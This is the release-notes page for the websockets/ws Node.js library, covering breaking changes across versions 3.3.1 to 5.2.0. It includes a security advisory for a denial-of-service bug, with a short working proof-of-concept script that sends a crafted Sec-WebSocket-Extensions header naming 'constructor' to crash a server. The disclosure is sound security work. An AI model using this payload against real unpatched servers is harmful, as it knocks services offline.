Releases: websockets/ws
Releases · websockets/ws
5.2.0
5.1.1
5.1.0
5.0.0
Breaking changes
- Dropped support for Node.js < 4.5.0 (#1313).
- The connection is no longer closed if the server does not agree to any of
the client's requested subprotocols (#1312). net.Socket
errors are no longer re-emitted (a4050db).
Features
- Read backpressure is now properly handled when permessage-deflate is enabled
(#1302).
4.1.0
4.0.0
Breaking changes
- The close status code is now set to 1005 if the received close frame contains
no status code (a31b1f6). - Error messages and types have been updated (695c5ea).
- The
onerror
event handler now receives anErrorEvent
instead of JavaScript
error (63e275e). - The third argument of
WebSocket.prototype.ping()
and
WebSocket.prototype.pong()
is no longer a boolean but an optional callback
(30c9f71). - The non-standard
protocolVersion
andbytesReceived
attributes have been
removed (30c9f71...ee9b5f3). - The
extensions
attribute is no longer an object but a string representing
the extensions selected by the server (fdec524). - The
'headers'
event on the client has been renamed to'upgrade'
. Listeners
of this event now receive only theresponse
argument (1c783c2). - The
WebSocket.prototype.pause()
andWebSocket.prototype.resume()
methods
have been removed to prevent the user from interfering with the state of the
underlyingnet.Socket
stream (a206e98).
3.3.3
3.3.2
3.3.1
Bug fixes
- Fixed a DoS vulnerability (c4fe466).
A specially crafted value of the Sec-WebSocket-Extensions
header that
used Object.prototype
property names as extension or parameter names
could be used to make a ws server crash.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
The vulnerability has been privately reported by Nick Starke and
Ryan Knell of Sonatype Security Research and promptly fixed. Please
update now!